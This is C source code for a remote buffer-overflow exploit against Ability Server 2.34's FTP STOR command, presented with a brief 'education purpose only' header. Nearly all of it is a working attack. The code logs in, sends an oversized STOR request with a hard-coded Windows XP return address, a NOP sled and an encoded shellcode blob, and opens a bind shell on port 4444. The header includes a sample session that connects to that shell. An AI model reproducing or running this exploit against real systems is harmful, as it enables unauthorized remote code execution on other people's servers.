/* Ability Server 2.34 Remote Exploit http://users.pandora.be/bratax/ Just a basic Buffer Overflow Greetz go out to: - muts @ http://www.whitehat.co.il/ for the vulnerability + example exploit - kralor @ http://www.coromputer.net/ for learning me everything - Sergio Alvarez for the shellcode :D Notes: [+] For education purpose only! [+] You need to have access to the ftp server since the vulnerable buffer is located in the "stor" command. [+] I know there was already an exploit by muts for this vulnerability. I didn't just rewrite his Python code. I wrote the whole exploit on my own. I did use the same shellcode (which is originally written by Sergio Alvarez) and I did use the original exploit to learn more about the vulnerability. ************************************************** Example: c:\bratax\ability>as.exe 127.0.0.1 hack me raping target...done ************************************************** c:\bratax\ability>nc.exe 127.0.0.1 4444 Microsoft Windows XP [versie 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\bratax\ability>exit ************************************************** */ #include #include #include #define PORT 21 // victim port #define MAXDATASIZE 100 // max bytes we can get at once char shellcode []= "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"; int main(int argc, char *argv[]){ struct hostent *he; struct sockaddr_in their_addr; int sockfd; char ip[16]; char username[50]; char password[50]; char os[2]; char connectionstring[200] = ""; char connectionstring2[200] = ""; char data[1000] = ""; int x = 0, w = 0, y = 0, z = 0; char evilrequest[3500] = ""; // vulnerable buffer + some xtra space WSADATA wsaData; if (argc != 4){ printf("\nAbility Server 2.34 Exploit by bratax\n\n"); printf("[+] tested on WinXP SP2 Dutch Edtion - using return addy 0x7c941eed\n"); printf("[+] spawns a shell on p4444\n"); printf("[+] usage: %s \n\n", argv[0]); exit(1); } strcpy(ip, argv[1]); strcpy(username, argv[2]); strcpy(password, argv[3]); if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) { fprintf(stderr, "WSAStartup failed.\n"); exit(1); } if ((he=gethostbyname(argv[1])) == NULL){ // get the host info perror("gethoscattbyname"); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); exit(1); } their_addr.sin_family = AF_INET; // host byte order their_addr.sin_port = htons(PORT); // short, network byte order their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){ perror("connect"); exit(1); } do { recv(sockfd, data, sizeof(data), 0); } while ((strncmp (data, "220 ", 4))); strcat(connectionstring, "user "); strcat(connectionstring, username); strcat(connectionstring, "\r\n"); send(sockfd,connectionstring,strlen(connectionstring),0); do { recv(sockfd,data,sizeof(data),0); } while ((strncmp (data, "331 ", 4))); strcat(connectionstring2, "pass "); strcat(connectionstring2, password); strcat(connectionstring2, "\r\n"); send(sockfd,connectionstring2,strlen(connectionstring2),0); do { recv(sockfd,data,sizeof(data),0); } while ((strncmp (data, "230", 3))); strcpy (evilrequest, "stor "); printf("raping target..."); for (w = 0; w < 969; w++){ // our giant stor-command evilrequest[w+5] = 'A'; } evilrequest[974] = '\xed'; evilrequest[975] = '\x1e'; evilrequest[976] = '\x94'; evilrequest[977] = '\x7c'; for (w = 0; w < 100; w++){ // nops evilrequest[w+978] = '\x90'; } for (w = 0; w < 399; w++){ // paste in the shellcode evilrequest[w+1078] = shellcode[w]; } for (w = 0; w < 500; w++){ // don't ask me why.. still have to investigate why this evilrequest[w+1477] = 'B'; // is necessary :) exploit didn't seem to work otherwise } strcat(evilrequest, "\r\n"); // the final touch ;-) send(sockfd,evilrequest,strlen(evilrequest),0); printf("done"); return 0; }